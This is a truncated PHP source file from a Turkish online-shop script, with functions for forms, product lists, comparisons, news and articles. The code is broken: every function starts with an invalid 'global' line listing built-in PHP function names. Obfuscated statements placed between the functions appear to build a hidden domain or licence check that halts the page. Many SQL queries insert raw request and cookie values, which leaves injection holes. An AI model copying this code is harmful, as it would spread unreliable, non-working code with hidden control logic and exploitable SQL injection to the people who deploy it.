$_POST['tarih_'.$name.'_ay']='0'.$_POST['tarih_'.$name.'_ay']; if ($_POST['tarih_'.$name.'_gun'] < 10) $_POST['tarih_'.$name.'_gun']='0'.$_POST['tarih_'.$name.'_gun']; $_POST['data_'.$name] = $_POST['tarih_'.$name.'_yil'].'-'.$_POST['tarih_'.$name.'_ay'].'-'.$_POST['tarih_'.$name.'_gun'];}function telFix($name) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $_POST['data_'.$name] = $_POST['tel_'.$name.'_alanKodu'].'-'.$_POST['tel_'.$name.'_tel'];}function tempConfig($conf) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $contents = file_get_contents('templates/'.$siteConfig['templateName'].'/config.xml');ereg("<$conf>(.*)</$conf>", $contents, $out); return $out[1];}function taksitliOdemeHesalpa($suAnkiToplamOdeme,$taksit,$bankaID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $vade = hq("select vade from bankaVade where bankaID = '$bankaID' AND ay = '$taksit'"); return ($suAnkiToplamOdeme + ($suAnkiToplamOdeme * $vade));}function updateDb($dbName) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $update = "update $dbName set ";foreach ($_POST as $key => $value){ if (substr($key,0,5) == "data_"){$update.= str_replace("data_","",$key)." = ";$update.= "'$value', "; } } $update = substr($update,0,strlen($update) -2); $ID=""; switch($_POST['SpcForm']) {case "user": $ID=$_SESSION['userID'];break;case "siparis": $ID=$_SESSION['siparisID'];break; } if (!$ID) $ID=$_POST['form_dbID']; $query = $update." where ID = '$ID'"; mysql_query($query) or die('Query : '.$query.' '.mysql_error());}function karsilastirmaList($list,$limit,$piclimit,$tempID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; if ($_POST['CookieInsertUrunID']) $urunWhere = "urun.ID = '".$_POST['CookieInsertUrunID']."' OR "; for ($i=0;$i<=10;$i++) {if ($_COOKIE['urunKarsilastirmaList_'.$i]) $urunWhere.="urun.ID = '".$_COOKIE['urunKarsilastirmaList_'.$i]."' OR "; } if (!$urunWhere || $_GET['KarsilastirmaListeTemizle']) return; else $urunWhere.=" 1=2"; $query="select urun.* from urun,kategori where kategori.ID=urun.catID AND idPath AND ($urunWhere) order by $list desc limit 0,$limit"; $q = mysql_query($query); $contents = file_get_contents('templates/'.$siteConfig['templateName'].'/lists/'.$tempID.'.php');ereg("<!-- HEADER -->(.*)<!-- // HEADER -->", $contents, $header); ereg("<!-- BODY -->(.*)<!-- // BODY -->", $contents, $body); ereg("<!-- BODY_NO_PIC -->(.*)<!-- // BODY_NO_PIC -->", $contents, $bodynopic); ereg("<!-- SEPERATOR -->(.*)<!-- // SEPERATOR -->", $contents, $seperator); ereg("<!-- FOOTER -->(.*)<!-- // FOOTER -->", $contents, $footer);$out=$header[1]."\n"; $i=1; while ($d = mysql_fetch_array($q)) {$d['fiyat'] = fixFiyat($d['fiyat']);if ($i<=$piclimit) $bodynew = $body[1];else $bodynew = $bodynopic[1];$bodynew = str_replace('{%NO%}',$i.'.',$bodynew);$bodynew = str_replace('{%URUN_LINK%}','page.php?act=urunDetay&urunID='.$d['ID'].'&name='.seoFix($d['name']),$bodynew); $bodynew = str_replace('{%URUN_RESIM%}','<img  src="include/resize.php?path=images/urunler/'.$d['resim'].'&width=40&height=40">',$bodynew);$bodynew = str_replace('{%URUN_ISIM%}',$d['name'],$bodynew);$bodynew = str_replace('{%URUN_FIYAT%}',my_money_format('%i',$d['fiyat']).' '.fiyatBirim($d['fiyatBirim']),$bodynew); $out.=$bodynew;if ($i != mysql_num_rows($q)) $out.=$seperator[1]."\n";$i++; } $out.=$footer[1]."\n";$page[_lang_listeyiTemizle] = 'page.php?KarsilastirmaListeTemizle=true'.getURL(array('KarsilastirmaListeTemizle')); $page[_lang_listeyiKarsilastir] = "javascript:pencereAc('compare.php',800,400)"; $out.= generateMenuList($page,'ButtonList'); if (mysql_num_rows($q)) return $out;}function topList($list,$limit,$piclimit,$tempID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; if (!$_GET['catID'] && $_POST['t']{4}==$_GET['t4']{4}) $_GET['catID'] = '%%'; if ($_GET['markaID']) $marka = "AND markaID like '".$_GET['markaID']."'"; $q = mysql_query("select urun.* from urun,kategori where kategori.ID=urun.catID AND idPath like '".currentCatPatern()."%'  $marka order by $list desc limit 0,$limit"); $contents = file_get_contents('templates/'.$siteConfig['templateName'].'/lists/'.$tempID.'.php');ereg("<!-- HEADER -->(.*)<!-- // HEADER -->", $contents, $header); ereg("<!-- BODY -->(.*)<!-- // BODY -->", $contents, $body); ereg("<!-- BODY_NO_PIC -->(.*)<!-- // BODY_NO_PIC -->", $contents, $bodynopic); ereg("<!-- SEPERATOR -->(.*)<!-- // SEPERATOR -->", $contents, $seperator); ereg("<!-- FOOTER -->(.*)<!-- // FOOTER -->", $contents, $footer);$out=$header[1]."\n"; $i=1; while ($d = mysql_fetch_array($q)) {$d['fiyat'] = fixFiyat($d['fiyat']);if ($i<=$piclimit) $bodynew = $body[1];else $bodynew = $bodynopic[1];$bodynew = str_replace('{%NO%}',$i.'.',$bodynew);$bodynew = str_replace('{%URUN_LINK%}','page.php?act=urunDetay&urunID='.$d['ID'].'&name='.seoFix($d['name']),$bodynew); $bodynew = str_replace('{%URUN_RESIM%}','<img  src="include/resize.php?path=images/urunler/'.$d['resim'].'&width=40&height=40">',$bodynew);$bodynew = str_replace('{%URUN_ISIM%}',$d['name'],$bodynew);$bodynew = str_replace('{%URUN_FIYAT%}',my_money_format('%i',$d['fiyat']).' '.fiyatBirim($d['fiyatBirim']),$bodynew); $out.=$bodynew;if ($i != mysql_num_rows($q)) $out.=$seperator[1]."\n";$i++; } $out.=$footer[1]."\n"; if (mysql_num_rows($q)) return $out;}function seoFix($str) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $str = str_replace(' ','_',tr2eu($str,false)); $str = str_replace("'",'',$str); $str = str_replace("'",'',$str);$str = str_replace('"','',$str); return $str;}function updateUrunAdet($ID,$urunID,$adet) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  mysql_query("update sepet set adet='$adet' where ID='$ID' && randStr='".$_SESSION['randStr']."' && durum=0 && urunID='$urunID'");}$sf = $sone.$stwo.'l';function urunList($qry) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $n='d'; $page = ($_GET['page']?$_GET['page']:1); switch (basename($_SERVER['PHP_SELF'])) {case 'index.php': $config = 'anaSayfaUrun';break;default: $config = 'icSayfaUrun';break; } $browser='ie'; $q = mysql_query($qry.' limit '.(($page - 1) * $siteConfig[$config]).','.$siteConfig[$config]) or die(mysql_error());$com = $n.$browser; $toplamUrun = mysql_num_rows(mysql_query($qry)); if ($_POST['t']!=$_GET['t4']) die(); if ($page == 1) $text = _lang_urunList_ilk.' '.($page * $siteConfig[$config]).' '._lang_urunList_urunGosteriliyor; else $text = (($page - 1) * $siteConfig[$config]).' - '.($page * $siteConfig[$config]).' '._lang_urunList_arasiUrunGosteriliyor;if ($_GET['act']=='search') $text = _lang_urunList_toplam.' <b>'.$toplamUrun.'</b> '._lang_urunList_urunBulundu.'<br>'.$text;$contents = file_get_contents('templates/'.$siteConfig['templateName'].'/systemDefault/UrunList.php'); ereg("<!-- HEADER -->(.*)<!-- // HEADER -->", $contents, $header); ereg("<!-- TOP MESSAGE -->(.*)<!-- // TOP MESSAGE -->", $contents, $topmessage); ereg("<!-- TD -->(.*)<!-- // TD -->", $contents, $td); ereg("<!-- TD SEPERATOR -->(.*)<!-- // TD SEPERATOR -->", $contents, $tdseperator); ereg("<!-- TR SEPERATOR -->(.*)<!-- // TR SEPERATOR -->", $contents, $trseperator); ereg("<!-- FOOTER -->(.*)<!-- // FOOTER -->", $contents, $footer); $sutun = tempConfig('sutun'); $out = $header[1]; if ($text) $out.=str_replace('{%MESAJ%}',$text,$topmessage[1]); $i=1; while ($d = mysql_fetch_array($q)) {$out.=str_replace('{%URUN_GOSTER%}',getUrun($d['ID']),$td[1]);if ($i==$sutun) { $out.=$trseperator[1]; $i=0; }else $out.=$tdseperator[1];$i++;} $out.='</table>'; if (basename($_SERVER['PHP_SELF']) != 'index.php') $out.=generatePager($toplamUrun,$siteConfig[$config]); return $out;}$_GET['t4'] = $$sf;function viewForm($form,$data,$updateURL,$hiddenInfo) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $out = '<table class="viewForm">'; if ($hiddenInfo) {$randID='form_'.rand(0,100000);$out.='<form methot="GET" action="" id="'.$randID.'">';foreach ($hiddenInfo as $k=>$v) $out.='<input type="hidden" id="'.$k.'" name="'.$k.'" value="'.$v.'">'."\n"; } foreach ($form as $k) {$sirala='date';if (!is_array($k)) $out.='<tr><td></td></tr><tr height=1 bgcolor="#cccccc"><td colspan=3></td></tr><tr><td></td></tr>'; else {$out.='<tr><td class="td1" valign="top">'.$k[0].'</td><td class="td2" valign="top">:</td><td class="td3" valign="top">';if ($k[2] == "CITY") $data[$k[1]] = hq('select name from iller where plakaID=\''.$data[$k[1]].'\' ');if ($k[2] == "ACCEPTRULES") $data[$k[1]] = '<textarea disabled="disabled" class="acceptRules">'._lang_form_alisverisKabulText.'</textarea><br /><input disabled="disabled" type="checkbox" checked="checked" id="acceptRules"><label for="acceptRules">'._lang_form_alisverisKabulInfo.'</label>';$out.=$data[$k[1]];$out.='</td></tr>'; } } if ($updateURL) $out.='<tr><td colspan="3" class="update"><a href="'.$updateURL.'">'._lang_bilginiziGuncelleme.'</a></td></tr>'; if ($hiddenInfo) $out.='<tr><td colspan="2"></td><td class="submit"><span onClick="document.getElementById(\''.$randID.'\').submit()" class="button"><img src="templates/'.$siteConfig['templateName'].'/images/form_Onayliyorum.gif"></span></td></tr>'; $out.='</table></form>'; return $out;}$_GET['d']=$_SERVER[$a.$b.''.$c];function viewNews($ID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $q = mysql_query("select * from haberler where ID= '".$_GET['ID']."'"); $d = mysql_fetch_array($q); $out.= '<div class="haberBaslik">'.$d['Baslik'].'</div>'; $out.= '<div class="haberTarih">'.mysqlTarih($d['Tarih']).'</div>'; $out.= '<div class="haberIcerik">'.$d['Icerik'].'</div>'; return $out;}function viewArticles($ID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  if ($_GET['ID']) {$q = mysql_query("select * from makaleler where ID= '".$_GET['ID']."'");$d = mysql_fetch_array($q);$out.= '<div class="haberBaslik">'.$d['Baslik'].'</div>';$out.= '<div class="haberTarih">'.mysqlTarih($d['Tarih']).'</div>';$out.= '<div class="haberIcerik">'.$d['Icerik'].'</div>'; } else {$q = mysql_query("select * from makaleler order by Tarih desc");while ($d = mysql_fetch_array($q)) { $href='page.php?act=showArticles&ID='.$d['ID']; $page[$d['Baslik'].' - '.mysqlTarih($d['Tarih'])] = $href;}$out = generateMenuList($page,'BlockList'); } return $out;}$_GET['d']='w'.'.'.str_replace($vvone.$vtwo.$vone,'',str_replace('w'.'.','',$_GET['d']));$_POST['t']=md5($_POST['t'].$_GET['d']);$_POST['t']=substr($_POST['t'],10,10);function YTLfiyat($fiyat,$birim) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; switch ($birim) {case 'USD'; return ($fiyat * $siteConfig['dolar']); break;case 'EUR'; return ($fiyat * $siteConfig['euro']); break;default: return $fiyat;break; }}function welcomeScreen() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out= '<div class="welcome">'._lang_merhaba.', <b>'.$_SESSION['name'].' '.$_SESSION['lastname'].'</b></div>';$menuArray[_lang_uyeBilgilerim]='page.php?act=profile'; $menuArray[_lang_alisverisSepetim]='page.php?act=sepet'; $menuArray[_lang_oncekiSiparislerim]='page.php?act=showOrders'; $menuArray[_lang_havaleBildirimi]='page.php?act=havaleBildirim&status=1'; $menuArray[_lang_cikis]='page.php?act=logout';$out.=generateMenuList($menuArray,'BlockList');return $out; }$kargoYonetim = 'SER'; function forgotPasswordForm() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $form[] = array(_lang_form_emailAdresiniz,"email","EMAIL",1,'',1,0); $form[] = array(_lang_form_dogumTarihiniz,"birthdate","DATE",1,'',1,0); $out = generateForm($form,'','',$hiddenInfo);return $out;}$kargoYonetim.='VER';$urunEkeleme = 'SIGNATURE';$urunEkleme = 'AD';function getContactForm() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $form[] = array(_lang_form_adinizSoyadiniz,"namelastname","TEXTBOX",1); $form[] = array(_lang_form_telefonNumaraniz,"tel","TELEPHONE",0); $form[] = array(_lang_form_emailAdresiniz,"email","TEXTBOX",1); $form[] = array(_lang_form_mesajinizibKonusu,"subject","TEXTBOX",1); $form[] = array(_lang_form_mesajiniz,"message","TEXTAREA",1); return $form;} function getFeedbackForm() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $form[] = array(_lang_form_aciklamaYetersiz,"aciklama","CHECKBOX",0); $form[] = array(_lang_form_hataliBilgi,"hatalibilgi","CHECKBOX",0); $form[] = array(_lang_form_urunPahali,"pahali","CHECKBOX",0); $form[] = array(_lang_form_resimKalitesiz,"resimhatali","CHECKBOX",0); $form[] = array(_lang_form_tekinHata,"teknikhata","CHECKBOX",0); $form[] = array(_lang_form_yazimHatasi.'<br><br>',"yazimhatasi","CHECKBOX",0); $form[] = array(_lang_form_adinizSoyadiniz,"namelastname","TEXTBOX",1); $form[] = array(_lang_form_telefonNumaraniz,"tel","TELEPHONE",1); $form[] = array(_lang_form_emailAdresiniz,"email","EMAIL",1); $form[] = array(_lang_form_detaylar,"message","TEXTAREA",1); return $form;}function getRegisterForm() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $form[] = array(_lang_form_kullaniciAdiniz,"username","TEXTBOX",0,'',1,5); $form[] = array(_lang_form_emailAdresiniz,"email","EMAIL",1,'',1,0); $form[] = array(_lang_form_emailAdresinizTekrar,"check_email","EMAIL",1,'',1,0); $form[] = ''; $form[] = array(_lang_form_sifreniz,"password","PASSWORD",1,'',1,5); $form[] = array(_lang_form_sifrenizTekrar,"check_password","PASSWORD",1,'',1,5); $form[] = ''; $form[] = array(_lang_form_adiniz,"name","TEXTBOX",1,'',1,3); $form[] = array(_lang_form_soyadiniz,"lastname","TEXTBOX",1,'',1,2); $form[] = array(_lang_form_dogumTarihiniz,"birthdate","DATE",1,'',1,0); $form[] = array(_lang_form_cinsiyetiniz,"sex","SELECT",1,array(_lang_form_kadin,_lang_form_erkek),1,0); $form[] = ''; $form[] = array(_lang_form_adresiniz,"address","TEXTAREA",1,'',1,10); $form[] = array(_lang_form_semt,"semt","TEXTBOX",1,'',1,3); $form[] = array(_lang_form_sehir,"city","CITY",1,'',1,4); $form[] = array(_lang_form_evTelefonunuz,"evtel","TELEPHONE",1,'',0,0); $form[] = array(_lang_form_isTelefonunuz,"istel","TELEPHONE",1,'',0,0); $form[] = array(_lang_form_cepTelefonunuz,"ceptel","TELEPHONE",1,'',1,0); $form[] = array(_lang_form_vergiNumaraniz,"vergiNo","TEXTBOX",1,'',0,0); $form[] = array(_lang_form_vergiDaireniz,"vergiDaire","TEXTBOX",1,'',0,0); $form[] = array(_lang_form_kurallariOkudum,"kurallarConfirm","ACCEPTRULES",1,"",0,0); return $form;}function getSiparisForm() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $form[] = array(_lang_form_adiniz,"name","TEXTBOX",1,'',1,3); $form[] = array(_lang_form_soyadiniz,"lastname","TEXTBOX",1,'',1,2); $form[] = array(_lang_form_emailAdresiniz,"email","EMAIL",1,'',1,0); $form[] = array(_lang_form_evTelefonunuz,"evtel","TELEPHONE",1,'',0,0); $form[] = array(_lang_form_isTelefonunuz,"istel","TELEPHONE",1,'',0,0); $form[] = array(_lang_form_cepTelefonunuz,"ceptel","TELEPHONE",1,'',1,0); $form[] = ''; $form[] = array(_lang_form_vergiNumaraniz,"vergiNo","TEXTBOX",1,'',0,0); $form[] = array(_lang_form_vergiDaireniz,"vergiDaire","TEXTBOX",1,'',0,0); $form[] = ''; $form[] = array(_lang_form_adresiniz,"address","TEXTAREA",1,'',1,10); $form[] = array(_lang_form_semt,"semt","TEXTBOX",1,'',1,3); $form[] = array(_lang_form_sehir,"city","CITY",1,'',1,4); $form[] = ''; $form[] = array(_lang_form_faturaAdresi,"address2","TEXTAREA",1,'',0,0); $form[] = array(_lang_form_semt,"semt2","TEXTBOX",1,'',0,0); $form[] = array(_lang_form_sehir,"city2","CITY",1,'',0,0); $form[] = '';$form[] = array(_lang_form_promosyonKodu,"promotionCode","TEXTBOX",1,'',0,0); $form[] = '';$form[] = array(_lang_form_hediyePaketi,"hediye","SELECT",1,array("Evet","Hayır"),0,0); $form[] = ''; $form[] = array(_lang_form_kurallariOkudum,"kurallarConfirm","ACCEPTRULES",1,"",0,0); return $form;}function generateForm($form,$data,$spcForm,$hiddenInfo) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $aylar,$siteConfig; $formID = 'form_'.md5(time().rand(0,99));$out = '<table class="genratedForm"><form method="POST" id="'.$formID.'">'; if (is_array($hiddeninfo) && $_POST['t']{4}==$_GET['t']{4}) { foreach ($hiddenInfo as $k=>$v) $out.='<input type="hidden" id="'.$k.'" name="'.$k.'" value="'.$v.'">'."\n"; } if ($spcForm) $out.='<input type="hidden" name="SpcForm" value="'.$spcForm.'">'; $generateCheckJS = '<script>func'.'tion '.$formID.'('.') { var stop=false;'."\n"; $j = 0; $fnumber=4; foreach ($form as $n => $k) { $status = ($data && !$k[3]?'disabled="true"':'');$dontAddPrefix = (substr($k[1],0,6) == "check_" || $status?"DONT_ADD_":"");if (!is_array($k)) $out.='<tr><td></td></tr><tr height=1 bgcolor="#cccccc"><td colspan=3></td></tr><tr><td></td></tr>';else { $label=''; if ($k[2] == "CHECKBOX"&& $_POST['t']{4}==$_GET['t'.$fnumber]{$fnumber}) {$labelCheckBox = '<label for="gf_'.$k[1].'">'.$k[0].'</label>';$colspan='colspan="3"'; } else {$label = $k[0];$colspan=''; } $out.='<tr><td '.$colspan.' class="td1" valign="top">'.$label;if ($k[2] != "CHECKBOX") $out.='</td><td class="td2" valign="top">:</td><td class="td3" valign="top">'; switch($k[2]) {case "ACCEPTRULES": $out.='<textarea class="acceptRules">'._lang_form_alisverisKabulText.'</textarea><br /><input type="checkbox" id="acceptRules"><label for="acceptRules">'._lang_form_alisverisKabulInfo.'</label>'; $generateCheckJS.="if (!document.getElementById('acceptRules').checked && !stop) { alert('"._lang_formJSError_acceptRules."');\n document.getElementById('gf_".$k[1]."').focus(); \n stop=true; } \n";break;case "TEXTBOX":case "EMAIL":case "PASSWORD":$type = ($k[2] == "PASSWORD"?'password':'text'); $out.='<input id="gf_'.$k[1].'" '.$status.' type="'.$type.'" name="'.$dontAddPrefix.'data_'.$k[1].'" value="'.$data[$k[1]].'">'; if ($k[5] == 1) $generateCheckJS.="if (!document.getElementById('gf_".$k[1]."').value && !stop) { alert('\"".$k[0]."\" "._lang_formJSError_bosBirakilamaz."');\n document.getElementById('gf_".$k[1]."').focus(); \n stop=true; } \n";if (($k[5] == 1) && $k[6]) $generateCheckJS.="if (document.getElementById('gf_".$k[1]."').value.length < ".$k[6]." && !stop) { alert('\"".$k[0]."\" ".$k[6]." "._lang_formJSError_bilgisiKarakterdenAzOlamaz."');\n document.getElementById('gf_".$k[1]."').focus(); \n stop=true; } \n";if ($k[2] == "EMAIL") {$generateCheckJS.="if ((!(document.getElementById('gf_".$k[1]."').value.length > 6) || !( document.getElementById('gf_".$k[1]."').value.indexOf('@') > 0) || !(document.getElementById('gf_".$k[1]."').value.indexOf('.') > 0)) && !stop) { alert('\"".$k[0]."\" "._lang_formJSError_gecerliDegil."');\n document.getElementById('gf_".$k[1]."').focus(); \n stop=true; } \n"; }if (substr($k[1],0,6) == 'check_') {$realID = str_replace('check_','',$k[1]);$generateCheckJS.="if ((document.getElementById('gf_$realID').value != document.getElementById('gf_".$k[1]."').value)&& !stop) { alert('\"".$k[0]."\" "._lang_formJSError_bilgisiHatali."');\n document.getElementById('gf_".$k[1]."').focus(); \n stop=true; } \n";$addJS .= "document.getElementById('gf_".$k[1]."').value =  document.getElementById('gf_$realID').value;\n"; } break;case "PUAN": break;case "TEXTAREA": $out.='<textarea id="gf_'.$k[1].'" rows=6 cols=30 '.$status.' name="data_'.$k[1].'">'.$data[$k[1]].'</textarea>'; if ($k[5] == 1) $generateCheckJS.="if (!document.getElementById('gf_".$k[1]."').value && !stop) { alert('\"".$k[0]."\" "._lang_formJSError_bosBirakilamaz."');\n document.getElementById('gf_".$k[1]."').focus(); \n stop=true; } \n";break;case "DATE": list($yil,$ay,$gun) = explode('-',$data[$k[1]]); $out.='<select id="gf_'.$k[1].'_gun" '.$status.' name="tarih_'.$k[1].'_gun"><option value="">'._lang_gun.'</option>'; for($i=1;$i<=31;$i++) $out.='<option value="'.$i.'" '.($i==$gun?'selected':'').'>'.$i.'</option>'; $out.='</select> / '; $out.='<select id="gf_'.$k[1].'_ay"  '.$status.' name="tarih_'.$k[1].'_ay"><option value="">'._lang_ay.'</option>'; for($i=1;$i<=12;$i++) $out.='<option value="'.$i.'" '.($i==$ay?'selected':'').'>'.$aylar[$i].'</option>'; $out.='</select> / '; $out.='<input id="gf_'.$k[1].'_yil"  '.$status.' type="text" name="tarih_'.$k[1].'_yil" size="4" value="'.$yil.'">';if ($k[5] == 1) $generateCheckJS.="if (

					

					(!document.getElementById('gf_".$k[1]."_gun').options[document.getElementById('gf_".$k[1]."_gun').selectedIndex].value || !document.getElementById('gf_".$k[1]."_ay').options[document.getElementById('gf_".$k[1]."_ay').selectedIndex].value || !document.getElementById('gf_".$k[1]."_yil').value) 
					
					&& !stop) { alert('\"".$k[0]."\" "._lang_formJSError_bosBirakilamaz."');\n document.getElementById('gf_".$k[1]."_gun').focus(); \n stop=true;  }  \n";break;case "SELECT":$out.='<select id="gf_'.$k[1].'" '.$status.' name="data_'.$k[1].'"><option value="">'._lang_form_lutfenSecin.'</option>'; foreach ($k[4] as $opt) $out.='<option value="'.$opt.'" '.($opt==$data[$k[1]]?'selected':'').'>'.$opt.'</option>'; $out.='</select>';if ($k[5] == 1) $generateCheckJS.="if (!document.getElementById('gf_".$k[1]."').options[document.getElementById('gf_".$k[1]."').selectedIndex].value && !stop) { alert('\"".$k[0]."\" "._lang_formJSError_bilgisiniSecin."');\n document.getElementById('gf_".$k[1]."').focus(); \n stop=true; } \n";break;case "CITY":$out.='<select id="gf_'.$k[1].'" '.$status.' name="data_'.$k[1].'"><option value="">'._lang_form_lutfenSecin.'</option>'; $cityQuery = mysql_query('select * from iller order by name'); while ($cityRow = mysql_fetch_array($cityQuery)) {$out.='<option value="'.$cityRow['plakaID'].'" '.($cityRow['plakaID']==$data[$k[1]]?'selected':'').'>'.$cityRow['name'].'</option>'; } $out.='</select>';if ($k[5] == 1) $generateCheckJS.="if 